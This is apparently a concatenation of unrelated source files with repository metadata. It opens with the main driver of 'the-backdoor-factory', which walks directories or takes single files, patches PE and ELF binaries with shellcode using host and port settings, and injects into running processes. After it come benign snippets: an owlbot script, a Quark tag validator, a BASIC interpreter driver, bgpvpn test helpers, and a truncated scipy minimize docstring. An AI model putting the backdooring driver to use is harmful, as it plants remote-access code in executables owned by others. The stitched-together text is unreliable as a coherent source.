                      help="Use this setting if you DON'T want to patch DLLs. Patches by default."
                      )

    (options, args) = parser.parse_args()

    def basicDiscovery(FILE):
        """Peek at the first four bytes of FILE and classify it.

        Returns 'PE' for an MZ header, 'ELF' for an ELF header, and
        None for anything else.
        """
        testBinary = open(FILE, 'rb')
        header = testBinary.read(4)
        testBinary.close()
        if 'MZ' in header:
            return 'PE'
        elif 'ELF' in header:
            return 'ELF'
        else:
            # NOTE(review): this bare string is a no-op expression, not a
            # print; unknown formats just fall through to ``return None``.
            'Only support ELF and PE file formats'
            return None

    # Print a randomly chosen banner unless -q was passed.
    if options.NO_BANNER is False:
        print choice(menu)
        print author
        print version
        time.sleep(1)

    # ---- directory mode (-d): walk a tree and backdoor each file ----
    if options.DIR:
        for root, subFolders, files in os.walk(options.DIR):
            for _file in files:
                options.FILE = os.path.join(root, _file)
                if os.path.isdir(options.FILE) is True:
                    print "Directory found, continuing"
                    continue
                is_supported = basicDiscovery(options.FILE)
                if is_supported is "PE":
                    supported_file = pebin(options.FILE,
                                           options.OUTPUT,
                                           options.SHELL,
                                           options.NSECTION,
                                           options.DISK_OFFSET,
                                           options.ADD_SECTION,
                                           options.CAVE_JUMPING,
                                           options.PORT,
                                           options.HOST,
                                           options.SUPPLIED_SHELLCODE,
                                           options.INJECTOR,
                                           options.CHANGE_ACCESS,
                                           options.VERBOSE,
                                           options.SUPPORT_CHECK,
                                           options.SHELL_LEN,
                                           options.FIND_CAVES,
                                           options.SUFFIX,
                                           options.DELETE_ORIGINAL,
                                           options.CAVE_MINER,
                                           options.IMAGE_TYPE,
                                           options.ZERO_CERT,
                                           options.CHECK_ADMIN,
                                           options.PATCH_DLL
                                           )
                elif is_supported is "ELF":
                    supported_file = elfbin(options.FILE,
                                            options.OUTPUT,
                                            options.SHELL,
                                            options.HOST,
                                            options.PORT,
                                            options.SUPPORT_CHECK,
                                            options.FIND_CAVES,
                                            options.SHELL_LEN,
                                            options.SUPPLIED_SHELLCODE,
                                            options.IMAGE_TYPE
                                            )
                # Support-check only: report and move on, no patching.
                if options.SUPPORT_CHECK is True:
                    if os.path.isfile(options.FILE):
                        is_supported = False
                        print "file", options.FILE
                        try:
                            is_supported = supported_file.support_check()
                        except Exception, e:
                            is_supported = False
                            print 'Exception:', str(e), '%s' % options.FILE
                        if is_supported is False or is_supported is None:
                            print "%s is not supported." % options.FILE
                            #continue
                        else:
                            print "%s is supported." % options.FILE
                            # if supported_file.flItms['runas_admin'] is True:
                            #     print "%s must be run as admin." % options.FILE
                        print "*" * 50
        if options.SUPPORT_CHECK is True:
            sys.exit()
        print ("You are going to backdoor the following "
               "items in the %s directory:"
               % options.DIR)
        dirlisting = os.listdir(options.DIR)
        for item in dirlisting:
            print "     {0}".format(item)
        answer = raw_input("Do you want to continue? (yes/no) ")
        if 'yes' in answer.lower():
            for item in dirlisting:
                #print item
                print "*" * 50
                options.File = options.DIR + '/' + item
                # NOTE(review): ``options.File`` (capital F only) looks like
                # a typo for ``options.FILE``; as written, FILE is never
                # updated inside this loop, so the checks below keep
                # operating on the last FILE set by the os.walk pass above
                # — confirm and fix upstream.
                if os.path.isdir(options.FILE) is True:
                    print "Directory found, continuing"
                    continue
                print ("backdooring file %s" % item)
                result = None
                is_supported = basicDiscovery(options.FILE)
                try:
                    if is_supported is "PE":
                        supported_file = pebin(options.FILE,
                                               options.OUTPUT,
                                               options.SHELL,
                                               options.NSECTION,
                                               options.DISK_OFFSET,
                                               options.ADD_SECTION,
                                               options.CAVE_JUMPING,
                                               options.PORT,
                                               options.HOST,
                                               options.SUPPLIED_SHELLCODE,
                                               options.INJECTOR,
                                               options.CHANGE_ACCESS,
                                               options.VERBOSE,
                                               options.SUPPORT_CHECK,
                                               options.SHELL_LEN,
                                               options.FIND_CAVES,
                                               options.SUFFIX,
                                               options.DELETE_ORIGINAL,
                                               options.CAVE_MINER,
                                               options.IMAGE_TYPE,
                                               options.ZERO_CERT,
                                               options.CHECK_ADMIN,
                                               options.PATCH_DLL
                                               )
                        supported_file.OUTPUT = None
                        supported_file.output_options()
                        result = supported_file.patch_pe()
                    elif is_supported is "ELF":
                        supported_file = elfbin(options.FILE,
                                                options.OUTPUT,
                                                options.SHELL,
                                                options.HOST,
                                                options.PORT,
                                                options.SUPPORT_CHECK,
                                                options.FIND_CAVES,
                                                options.SHELL_LEN,
                                                options.SUPPLIED_SHELLCODE,
                                                options.IMAGE_TYPE
                                                )
                        supported_file.OUTPUT = None
                        supported_file.output_options()
                        result = supported_file.patch_elf()
                    if result is None:
                        print 'Not Supported. Continuing'
                        continue
                    else:
                        print ("[*] File {0} is in backdoored "
                               "directory".format(supported_file.FILE))
                except Exception as e:
                    print "DIR ERROR", str(e)
        else:
            print("Goodbye")
            sys.exit()

    # ---- injector mode (-i): hunt running targets and inject ----
    if options.INJECTOR is True:
        # NOTE(review): unlike the other pebin() calls, this positional
        # argument list omits options.CAVE_MINER between DELETE_ORIGINAL
        # and IMAGE_TYPE, which shifts every later argument by one —
        # confirm against pebin.__init__ and fix if so.
        supported_file = pebin(options.FILE,
                               options.OUTPUT,
                               options.SHELL,
                               options.NSECTION,
                               options.DISK_OFFSET,
                               options.ADD_SECTION,
                               options.CAVE_JUMPING,
                               options.PORT,
                               options.HOST,
                               options.SUPPLIED_SHELLCODE,
                               options.INJECTOR,
                               options.CHANGE_ACCESS,
                               options.VERBOSE,
                               options.SUPPORT_CHECK,
                               options.SHELL_LEN,
                               options.FIND_CAVES,
                               options.SUFFIX,
                               options.DELETE_ORIGINAL,
                               options.IMAGE_TYPE,
                               options.ZERO_CERT,
                               options.CHECK_ADMIN,
                               options.PATCH_DLL
                               )
        supported_file.injector()
        sys.exit()

    # ---- single-file mode: -f is mandatory from here on ----
    if not options.FILE:
        parser.print_help()
        sys.exit()

    #OUTPUT = output_options(options.FILE, options.OUTPUT)

    is_supported = basicDiscovery(options.FILE)
    if is_supported is "PE":
        supported_file = pebin(options.FILE,
                               options.OUTPUT,
                               options.SHELL,
                               options.NSECTION,
                               options.DISK_OFFSET,
                               options.ADD_SECTION,
                               options.CAVE_JUMPING,
                               options.PORT,
                               options.HOST,
                               options.SUPPLIED_SHELLCODE,
                               options.INJECTOR,
                               options.CHANGE_ACCESS,
                               options.VERBOSE,
                               options.SUPPORT_CHECK,
                               options.SHELL_LEN,
                               options.FIND_CAVES,
                               options.SUFFIX,
                               options.DELETE_ORIGINAL,
                               options.CAVE_MINER,
                               options.IMAGE_TYPE,
                               options.ZERO_CERT,
                               options.CHECK_ADMIN,
                               options.PATCH_DLL
                               )
    elif is_supported is "ELF":
        supported_file = elfbin(options.FILE,
                                options.OUTPUT,
                                options.SHELL,
                                options.HOST,
                                options.PORT,
                                options.SUPPORT_CHECK,
                                options.FIND_CAVES,
                                options.SHELL_LEN,
                                options.SUPPLIED_SHELLCODE,
                                options.IMAGE_TYPE
                                )
    else:
        print "Not supported."
        sys.exit()

    result = supported_file.run_this()
    if result is True and options.SUPPORT_CHECK is False:
        print "File {0} is in the 'backdoored' directory".format(supported_file.FILE)
#END BDF MAIN

if __name__ == "__main__":
    # NOTE(review): all real work already ran when the bdfMain class body
    # was executed at import time; this call only creates an (empty)
    # instance — confirm before relying on the guard.
    bdfMain()
| {
"content_hash": "2f027b3cefc3cd7aab4ce023066f722d",
"timestamp": "",
"source": "github",
"line_count": 493,
"max_line_length": 110,
"avg_line_length": 48.66937119675456,
"alnum_prop": 0.40201717095940653,
"repo_name": "0x0mar/the-backdoor-factory",
"id": "9b830c8891aaf9bc29eab31c661a55de05b717e8",
"size": "24016",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "backdoor.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
"""This script is used to synthesize generated parts of this library."""
import synthtool.languages.node as node
node.owlbot_main(templates_excludes=['.github/bug-report.md'])
| {
"content_hash": "499a7dd0cd813afd800b46a964d7870e",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 72,
"avg_line_length": 35.6,
"alnum_prop": 0.7696629213483146,
"repo_name": "googleapis/nodejs-bigquery",
"id": "02cd29578ab9b7d4c892a5ed96c260b988db231b",
"size": "753",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "owlbot.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "2950"
},
{
"name": "Python",
"bytes": "753"
},
{
"name": "TypeScript",
"bytes": "552357"
}
],
"symlink_target": ""
} |
from neutron.common import exceptions
class TagValidationError(Exception):
    """Raised when a tag value fails validation.

    Attributes:
        value: the rejected tag value.
        message: human-readable reason the value was rejected.
    """

    def __init__(self, value, message):
        # Pass the message to Exception so str(exc) and logging output show
        # the reason; the original left the base class uninitialized, which
        # made str(exc) an empty string.
        super(TagValidationError, self).__init__(message)
        self.value = value
        self.message = message
class Tag(object):
    """Base class for typed tags stored on a model's ``tags`` list.

    A tag is persisted as the string ``<PREFIX>:<value>`` where the
    prefix is the upper-cased API name of the tag (``NAME`` on the
    subclass).  Subclasses must define ``NAME`` and ``validate``.
    """

    @classmethod
    def get_name(cls):
        """API name of the tag."""
        if not hasattr(cls, 'NAME'):
            raise NotImplementedError()
        return cls.NAME

    @classmethod
    def get_prefix(cls):
        """Tag 'key', saved in the database as <prefix>:<value>."""
        return cls.get_name().upper() + ":"

    def serialize(self, value):
        """Render *value* in its persisted '<PREFIX>:<value>' form."""
        return "%s%s" % (self.get_prefix(), value)

    def deserialize(self, tag):
        """Strip the prefix from *tag*; returns None when it is absent."""
        if not self.is_tag(tag):
            return None
        try:
            return tag[len(self.get_prefix()):]
        except Exception:
            return None

    def validate(self, value):
        """Subclass hook: raise TagValidationError for invalid values."""
        raise NotImplementedError

    def set(self, model, value):
        """Set tag on model object (replacing any existing match)."""
        self.validate(value)
        self._pop(model)
        model.tags.append(self.serialize(value))

    def get(self, model):
        """Get a matching valid tag off the model."""
        for candidate in model.tags:
            if not self.is_tag(candidate):
                continue
            value = self.deserialize(candidate)
            try:
                self.validate(value)
            except TagValidationError:
                continue
            return value
        return None

    def _pop(self, model):
        """Pop all matching tags off the model and return them."""
        matching = [t for t in model.tags if self.is_tag(t)]
        # Remove after collecting so we never mutate while scanning.
        for t in matching:
            model.tags.remove(t)
        return matching

    def pop(self, model):
        """Pop all matching tags off the model, return the first valid one."""
        for tag in self._pop(model):
            value = self.deserialize(tag)
            try:
                self.validate(value)
            except TagValidationError:
                continue
            return value

    def is_tag(self, tag):
        """Is a given tag string of this type?"""
        return tag.startswith(self.get_prefix())

    def has_tag(self, model):
        """Does the given model carry a tag of this type?"""
        return any(self.is_tag(t) for t in model.tags)
class VlanTag(Tag):
    """Tag holding a VLAN ID in the range [MIN_VLAN_ID, MAX_VLAN_ID]."""

    NAME = "vlan_id"
    MIN_VLAN_ID = 1
    # NOTE(review): 802.1Q VLAN IDs normally top out at 4094/4095; confirm
    # that the inclusive upper bound of 4096 is intended before changing it.
    MAX_VLAN_ID = 4096

    def validate(self, value):
        """Validates a VLAN ID.

        :param value: The VLAN ID to validate against.
        :raises TagValidationError: Raised if the VLAN ID is invalid.
        """
        # Explicit checks instead of ``assert`` statements: asserts are
        # stripped when Python runs with -O, which would silently disable
        # range validation entirely.
        try:
            vlan_id_int = int(value)
        except (TypeError, ValueError):
            vlan_id_int = None
        if (vlan_id_int is None or
                vlan_id_int < self.MIN_VLAN_ID or
                vlan_id_int > self.MAX_VLAN_ID):
            msg = ("Invalid vlan_id. Got '%(vlan_id)s'. "
                   "vlan_id should be an integer between %(min)d and %(max)d "
                   "inclusive." % {'vlan_id': value,
                                   'min': self.MIN_VLAN_ID,
                                   'max': self.MAX_VLAN_ID})
            raise TagValidationError(value, msg)
        return True
class TagRegistry(object):
    """Lookup table mapping tag names to Tag handler instances."""

    tags = {}

    def get_all(self, model):
        """Get all known tags from a model.

        Returns a dict of {<tag_name>:<tag_value>}.
        """
        found = {}
        for name, handler in self.tags.items():
            # A name is reported only when at least one stored tag
            # carries that handler's prefix.
            if any(handler.is_tag(t) for t in model.tags):
                found[name] = handler.get(model)
        return found

    def set_all(self, model, **tags):
        """Validate and set all known tags on a port."""
        for name, handler in self.tags.items():
            if name not in tags:
                continue
            value = tags.pop(name)
            if not value:
                continue
            try:
                handler.set(model, value)
            except TagValidationError as e:
                # Surface validation failures as API-level bad requests.
                raise exceptions.BadRequest(
                    resource="tags",
                    msg="%s" % (e.message))
class PortTagRegistry(TagRegistry):
    """Registry of the tag types recognized on port models."""

    def __init__(self):
        vlan = VlanTag()
        self.tags = {vlan.get_name(): vlan}
PORT_TAG_REGISTRY = PortTagRegistry()
| {
"content_hash": "7d0c4b5130080a3dc06ea081b777c8d1",
"timestamp": "",
"source": "github",
"line_count": 161,
"max_line_length": 78,
"avg_line_length": 28,
"alnum_prop": 0.5031055900621118,
"repo_name": "asadoughi/quark",
"id": "d1d959be8d9f1fa692dcbde207848fa66b171b76",
"size": "5133",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "quark/tags.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "1267108"
},
{
"name": "Shell",
"bytes": "861"
}
],
"symlink_target": ""
} |
# Interactive BASIC driver with parser debug logging enabled.
import sys
sys.path.insert(0, "../..")

# Python 3 compatibility: alias raw_input to input.
if sys.version_info[0] >= 3:
    raw_input = input

import logging
# Parser debug output goes to parselog.txt, overwritten on every run.
logging.basicConfig(
    level=logging.INFO,
    filename="parselog.txt",
    filemode="w"
)
log = logging.getLogger()

import basiclex
import basparse
import basinterp

# If a filename has been specified, we try to run it.
# If a runtime error occurs, we bail out and enter
# interactive mode below
if len(sys.argv) == 2:
    data = open(sys.argv[1]).read()
    prog = basparse.parse(data, debug=log)
    if not prog:
        raise SystemExit
    b = basinterp.BasicInterpreter(prog)
    try:
        b.run()
        raise SystemExit
    except RuntimeError:
        pass
else:
    b = basinterp.BasicInterpreter({})

# Interactive mode. This incrementally adds/deletes statements
# from the program stored in the BasicInterpreter object. In
# addition, special commands 'NEW','LIST',and 'RUN' are added.
# Specifying a line number with no code deletes that line from
# the program.
while 1:
    try:
        line = raw_input("[BASIC] ")
    except EOFError:
        raise SystemExit
    if not line:
        continue
    line += "\n"
    prog = basparse.parse(line, debug=log)
    if not prog:
        continue
    keys = list(prog)
    # Positive keys are numbered program lines; merge them into the program.
    if keys[0] > 0:
        b.add_statements(prog)
    else:
        # Key 0 holds an immediate-mode statement tuple.
        stat = prog[keys[0]]
        if stat[0] == 'RUN':
            try:
                b.run()
            except RuntimeError:
                pass
        elif stat[0] == 'LIST':
            b.list()
        elif stat[0] == 'BLANK':
            # A bare line number deletes that line from the program.
            b.del_line(stat[1])
        elif stat[0] == 'NEW':
            b.new()
| {
"content_hash": "09f086bc3428024b3b002a6b1d9e9dd1",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 63,
"avg_line_length": 23.285714285714285,
"alnum_prop": 0.5901840490797546,
"repo_name": "todaychi/hue",
"id": "9dcc7feda692e5b5a6df3a99dd2f82be34838179",
"size": "1679",
"binary": false,
"copies": "11",
"ref": "refs/heads/master",
"path": "desktop/core/ext-py/ply-3.9/example/BASIC/basiclog.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "3096"
},
{
"name": "Batchfile",
"bytes": "41710"
},
{
"name": "C",
"bytes": "2717013"
},
{
"name": "C++",
"bytes": "199945"
},
{
"name": "CSS",
"bytes": "691188"
},
{
"name": "Emacs Lisp",
"bytes": "11704"
},
{
"name": "Genshi",
"bytes": "946"
},
{
"name": "Go",
"bytes": "6671"
},
{
"name": "HTML",
"bytes": "23983570"
},
{
"name": "Java",
"bytes": "575404"
},
{
"name": "JavaScript",
"bytes": "5432201"
},
{
"name": "Lex",
"bytes": "39802"
},
{
"name": "M4",
"bytes": "1377"
},
{
"name": "Makefile",
"bytes": "146585"
},
{
"name": "Mako",
"bytes": "3525679"
},
{
"name": "Myghty",
"bytes": "936"
},
{
"name": "PLSQL",
"bytes": "31565"
},
{
"name": "PLpgSQL",
"bytes": "3646"
},
{
"name": "Perl",
"bytes": "3499"
},
{
"name": "PigLatin",
"bytes": "328"
},
{
"name": "Python",
"bytes": "45877726"
},
{
"name": "Roff",
"bytes": "16669"
},
{
"name": "Shell",
"bytes": "46975"
},
{
"name": "Smarty",
"bytes": "130"
},
{
"name": "Thrift",
"bytes": "278712"
},
{
"name": "Visual Basic",
"bytes": "2884"
},
{
"name": "XSLT",
"bytes": "521413"
},
{
"name": "Yacc",
"bytes": "353353"
}
],
"symlink_target": ""
} |
from openstack_dashboard.test import helpers
from bgpvpn_dashboard.test.test_data import utils
class TestCase(helpers.TestCase):
    """Horizon test case that also loads the BGP VPN test fixtures."""

    def _setup_test_data(self):
        # Extend the base fixtures with bgpvpn-specific test data.
        super(TestCase, self)._setup_test_data()
        utils.load_test_data(self)
class APITestCase(helpers.APITestCase):
    """API-level test case that also loads the BGP VPN test fixtures."""

    def _setup_test_data(self):
        # Extend the base fixtures with bgpvpn-specific test data.
        super(APITestCase, self)._setup_test_data()
        utils.load_test_data(self)
| {
"content_hash": "c8be05ca7e0903dedb8daf22a8d0a6a7",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 51,
"avg_line_length": 24.176470588235293,
"alnum_prop": 0.7007299270072993,
"repo_name": "openstack/networking-bgpvpn",
"id": "f3cfa374fc7a8e97d6aca4516eba215fd676f70a",
"size": "1038",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bgpvpn_dashboard/test/helpers.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "5665"
},
{
"name": "Mako",
"bytes": "1055"
},
{
"name": "Python",
"bytes": "477528"
},
{
"name": "Shell",
"bytes": "4835"
}
],
"symlink_target": ""
} |
"""
Unified interfaces to minimization algorithms.
Functions
---------
- minimize : minimization of a function of several variables.
- minimize_scalar : minimization of a function of one variable.
"""
from __future__ import division, print_function, absolute_import
__all__ = ['minimize', 'minimize_scalar']
from warnings import warn
import numpy as np
from scipy._lib.six import callable
# unconstrained minimization
from .optimize import (_minimize_neldermead, _minimize_powell, _minimize_cg,
_minimize_bfgs, _minimize_newtoncg,
_minimize_scalar_brent, _minimize_scalar_bounded,
_minimize_scalar_golden, MemoizeJac)
from ._trustregion_dogleg import _minimize_dogleg
from ._trustregion_ncg import _minimize_trust_ncg
# constrained minimization
from .lbfgsb import _minimize_lbfgsb
from .tnc import _minimize_tnc
from .cobyla import _minimize_cobyla
from .slsqp import _minimize_slsqp
def minimize(fun, x0, args=(), method=None, jac=None, hess=None,
hessp=None, bounds=None, constraints=(), tol=None,
callback=None, options=None):
"""Minimization of scalar function of one or more variables.
In general, the optimization problems are of the form::
minimize f(x) subject to
g_i(x) >= 0, i = 1,...,m
h_j(x) = 0, j = 1,...,p
where x is a vector of one or more variables.
``g_i(x)`` are the inequality constraints.
``h_j(x)`` are the equality constrains.
Optionally, the lower and upper bounds for each element in x can also be
specified using the `bounds` argument.
Parameters
----------
fun : callable
Objective function.
x0 : ndarray
Initial guess.
args : tuple, optional
Extra arguments passed to the objective function and its
derivatives (Jacobian, Hessian).
method : str or callable, optional
Type of solver. Should be one of
- 'Nelder-Mead' :ref:`(see here) <optimize.minimize-neldermead>`
- 'Powell' :ref:`(see here) <optimize.minimize-powell>`
- 'CG' :ref:`(see here) <optimize.minimize-cg>`
- 'BFGS' :ref:`(see here) <optimize.minimize-bfgs>`
- 'Newton-CG' :ref:`(see here) <optimize.minimize-newtoncg>`
- 'L-BFGS-B' :ref:`(see here) <optimize.minimize-lbfgsb>`
- 'TNC' :ref:`(see here) <optimize.minimize-tnc>`
- 'COBYLA' :ref:`(see here) <optimize.minimize-cobyla>`
- 'SLSQP' :ref:`(see here) <optimize.minimize-slsqp>`
- 'dogleg' :ref:`(see here) <optimize.minimize-dogleg>`
- 'trust-ncg' :ref:`(see here) <optimize.minimize-trustncg>`
- custom - a callable object (added in version 0.14.0),
see below for description.
If not given, chosen to be one of ``BFGS``, ``L-BFGS-B``, ``SLSQP``,
depending if the problem has constraints or bounds.
jac : bool or callable, optional
Jacobian (gradient) of objective function. Only for CG, BFGS,
Newton-CG, L-BFGS-B, TNC, SLSQP, dogleg, trust-ncg.
If `jac` is a Boolean and is True, `fun` is assumed to return the
gradient along with the objective function. If False, the
gradient will be estimated numerically.
`jac` can also be a callable returning the gradient of the
objective. In this case, it must accept the same arguments as `fun`.
hess, hessp : callable, optional
Hessian (matrix of second-order derivatives) of objective function or
Hessian of objective function times an arbitrary vector p. Only for
Newton-CG, dogleg, trust-ncg.
Only one of `hessp` or `hess` needs to be given. If `hess` is
provided, then `hessp` will be ignored. If neither `hess` nor
`hessp` is provided, then the Hessian product will be approximated
using finite differences on `jac`. `hessp` must compute the Hessian
times an arbitrary vector.
bounds : sequence, optional
Bounds for variables (only for L-BFGS-B, TNC and SLSQP).
``(min, max)`` pairs for each element in ``x``, defining
the bounds on that parameter. Use None for one of ``min`` or
``max`` when there is no bound in that direction.
constraints : dict or sequence of dict, optional
Constraints definition (only for COBYLA and SLSQP).
Each constraint is defined in a dictionary with fields:
type : str
Constraint type: 'eq' for equality, 'ineq' for inequality.
fun : callable
The function defining the constraint.
jac : callable, optional
The Jacobian of `fun` (only for SLSQP).
args : sequence, optional
Extra arguments to be passed to the function and Jacobian.
Equality constraint means that the constraint function result is to
be zero whereas inequality means that it is to be non-negative.
Note that COBYLA only supports inequality constraints.
tol : float, optional
Tolerance for termination. For detailed control, use solver-specific
options.
options : dict, optional
A dictionary of solver options. All methods accept the following
generic options:
maxiter : int
Maximum number of iterations to perform.
disp : bool
Set to True to print convergence messages.
For method-specific options, see :func:`show_options()`.
callback : callable, optional
Called after each iteration, as ``callback(xk)``, where ``xk`` is the
current parameter vector.
Returns
-------
res : OptimizeResult
The optimization result represented as a ``OptimizeResult`` object.
Important attributes are: ``x`` the solution array, ``success`` a
Boolean flag indicating if the optimizer exited successfully and
``message`` which describes the cause of the termination. See
`OptimizeResult` for a description of other attributes.
See also
--------
minimize_scalar : Interface to minimization algorithms for scalar
univariate functions
show_options : Additional options accepted by the solvers
Notes
-----
This section describes the available solvers that can be selected by the
'method' parameter. The default method is *BFGS*.
**Unconstrained minimization**
Method :ref:`Nelder-Mead <optimize.minimize-neldermead>` uses the
Simplex algorithm [1]_, [2]_. This algorithm is robust in many
applications. However, if numerical computation of derivative can be
trusted, other algorithms using the first and/or second derivatives
information might be preferred for their better performance in
general.
Method :ref:`Powell <optimize.minimize-powell>` is a modification
of Powell's method [3]_, [4]_ which is a conjugate direction
method. It performs sequential one-dimensional minimizations along
each vector of the directions set (`direc` field in `options` and
`info`), which is updated at each iteration of the main
minimization loop. The function need not be differentiable, and no
derivatives are taken.
Method :ref:`CG <optimize.minimize-cg>` uses a nonlinear conjugate
gradient algorithm by Polak and Ribiere, a variant of the
Fletcher-Reeves method described in [5]_ pp. 120-122. Only the
first derivatives are used.
Method :ref:`BFGS <optimize.minimize-bfgs>` uses the quasi-Newton
method of Broyden, Fletcher, Goldfarb, and Shanno (BFGS) [5]_
pp. 136. It uses the first derivatives only. BFGS has proven good
performance even for non-smooth optimizations. This method also
returns an approximation of the Hessian inverse, stored as
`hess_inv` in the OptimizeResult object.
Method :ref:`Newton-CG <optimize.minimize-newtoncg>` uses a
Newton-CG algorithm [5]_ pp. 168 (also known as the truncated
Newton method). It uses a CG method to the compute the search
direction. See also *TNC* method for a box-constrained
minimization with a similar algorithm.
Method :ref:`dogleg <optimize.minimize-dogleg>` uses the dog-leg
trust-region algorithm [5]_ for unconstrained minimization. This
algorithm requires the gradient and Hessian; furthermore the
Hessian is required to be positive definite.
Method :ref:`trust-ncg <optimize.minimize-trustncg>` uses the
Newton conjugate gradient trust-region algorithm [5]_ for
unconstrained minimization. This algorithm requires the gradient
and either the Hessian or a function that computes the product of
the Hessian with a given vector.
**Constrained minimization**
Method :ref:`L-BFGS-B <optimize.minimize-lbfgsb>` uses the L-BFGS-B
algorithm [6]_, [7]_ for bound constrained minimization.
Method :ref:`TNC <optimize.minimize-tnc>` uses a truncated Newton
algorithm [5]_, [8]_ to minimize a function with variables subject
to bounds. This algorithm uses gradient information; it is also
called Newton Conjugate-Gradient. It differs from the *Newton-CG*
method described above as it wraps a C implementation and allows
each variable to be given upper and lower bounds.
Method :ref:`COBYLA <optimize.minimize-cobyla>` uses the
Constrained Optimization BY Linear Approximation (COBYLA) method
[9]_, [10]_, [11]_. The algorithm is based on linear
approximations to the objective function and each constraint. The
method wraps a FORTRAN implementation of the algorithm. The
constraints functions 'fun' may return either a single number
or an array or list of numbers.
Method :ref:`SLSQP <optimize.minimize-slsqp>` uses Sequential
Least SQuares Programming to minimize a function of several
variables with any combination of bounds, equality and inequality
constraints. The method wraps the SLSQP Optimization subroutine
originally implemented by Dieter Kraft [12]_. Note that the
wrapper handles infinite values in bounds by converting them into
large floating values.
**Custom minimizers**
It may be useful to pass a custom minimization method, for example
when using a frontend to this method such as `scipy.optimize.basinhopping`
or a different library. You can simply pass a callable as the ``method``
parameter.
The callable is called as ``method(fun, x0, args, **kwargs, **options)``
where ``kwargs`` corresponds to any other parameters passed to `minimize`
(such as `callback`, `hess`, etc.), except the `options` dict, which has
its contents also passed as `method` parameters pair by pair. Also, if
`jac` has been passed as a bool type, `jac` and `fun` are mangled so that
`fun` returns just the function values and `jac` is converted to a function
returning the Jacobian. The method shall return an ``OptimizeResult``
object.
The provided `method` callable must be able to accept (and possibly ignore)
arbitrary parameters; the set of parameters accepted by `minimize` may
expand in future versions and then these parameters will be passed to
the method. You can find an example in the scipy.optimize tutorial.
.. versionadded:: 0.11.0
References
----------
.. [1] Nelder, J A, and R Mead. 1965. A Simplex Method for Function
Minimization. The Computer Journal 7: 308-13.
.. [2] Wright M H. 1996. Direct search methods: Once scorned, now
respectable, in Numerical Analysis 1995: Proceedings of the 1995
Dundee Biennial Conference in Numerical Analysis (Eds. D F
Griffiths and G A Watson). Addison Wesley Longman, Harlow, UK.
191-208.
.. [3] Powell, M J D. 1964. An efficient method for finding the minimum of
a function of several variables without calculating derivatives. The
Computer Journal 7: 155-162.
.. [4] Press W, S A Teukolsky, W T Vetterling and B P Flannery.
Numerical Recipes (any edition), Cambridge University Press.
.. [5] Nocedal, J, and S J Wright. 2006. Numerical Optimization.
Springer New York.
.. [6] Byrd, R H and P Lu and J. Nocedal. 1995. A Limited Memory
Algorithm for Bound Constrained Optimization. SIAM Journal on
Scientific and Statistical Computing 16 (5): 1190-1208.
.. [7] Zhu, C and R H Byrd and J Nocedal. 1997. L-BFGS-B: Algorithm
778: L-BFGS-B, FORTRAN routines for large scale bound constrained
optimization. ACM Transactions on Mathematical Software 23 (4):
550-560.
.. [8] Nash, S G. Newton-Type Minimization Via the Lanczos Method.
1984. SIAM Journal of Numerical Analysis 21: 770-778.
.. [9] Powell, M J D. A direct search optimization method that models
the objective and constraint functions by linear interpolation.
1994. Advances in Optimization and Numerical Analysis, eds. S. Gomez
and J-P Hennart, Kluwer Academic (Dordrecht), 51-67.
.. [10] Powell M J D. Direct search algorithms for optimization
calculations. 1998. Acta Numerica 7: 287-336.
.. [11] Powell M J D. A view of algorithms for optimization without
derivatives. 2007.Cambridge University Technical Report DAMTP
2007/NA03
.. [12] Kraft, D. A software package for sequential quadratic
programming. 1988. Tech. Rep. DFVLR-FB 88-28, DLR German Aerospace
Center -- Institute for Flight Mechanics, Koln, Germany.
Examples
--------
Let us consider the problem of minimizing the Rosenbrock function. This
function (and its respective derivatives) is implemented in `rosen`
(resp. `rosen_der`, `rosen_hess`) in the `scipy.optimize`.
>>> from scipy.optimize import minimize, rosen, rosen_der
A simple application of the *Nelder-Mead* method is:
>>> x0 = [1.3, 0.7, 0.8, 1.9, 1.2]
>>> res = minimize(rosen, x0, method='Nelder-Mead', tol=1e-6)
>>> res.x
array([ 1., 1., 1., 1., 1.])
Now using the *BFGS* algorithm, using the first derivative and a few
options:
>>> res = minimize(rosen, x0, method='BFGS', jac=rosen_der,
... options={'gtol': 1e-6, 'disp': True})
Optimization terminated successfully.
Current function value: 0.000000
Iterations: 26
Function evaluations: 31
Gradient evaluations: 31
>>> res.x
array([ 1., 1., 1., 1., 1.])
>>> print(res.message)
Optimization terminated successfully.
>>> res.hess_inv
array([[ 0.00749589, 0.01255155, 0.02396251, 0.04750988, 0.09495377], # may vary
[ 0.01255155, 0.02510441, 0.04794055, 0.09502834, 0.18996269],
[ 0.02396251, 0.04794055, 0.09631614, 0.19092151, 0.38165151],
[ 0.04750988, 0.09502834, 0.19092151, 0.38341252, 0.7664427 ],
[ 0.09495377, 0.18996269, 0.38165151, 0.7664427, 1.53713523]])
Next, consider a minimization problem with several constraints (namely
Example 16.4 from [5]_). The objective function is:
>>> fun = lambda x: (x[0] - 1)**2 + (x[1] - 2.5)**2
There are three constraints defined as:
>>> cons = ({'type': 'ineq', 'fun': lambda x: x[0] - 2 * x[1] + 2},
... {'type': 'ineq', 'fun': lambda x: -x[0] - 2 * x[1] + 6},
... {'type': 'ineq', 'fun': lambda x: -x[0] + 2 * x[1] + 2})
And variables must be positive, hence the following bounds:
>>> bnds = ((0, None), (0, None))
The optimization problem is solved using the SLSQP method as:
>>> res = minimize(fun, (2, 0), method='SLSQP', bounds=bnds,
... constraints=cons)
It should converge to the theoretical solution (1.4 ,1.7).
"""
x0 = np.asarray(x0)
if x0.dtype.kind in np.typecodes["AllInteger"]:
x0 = np.asarray(x0, dtype=float)
if not isinstance(args, tuple):
args = (args,)
if method is None:
# Select automatically
if constraints:
method = 'SLSQP'
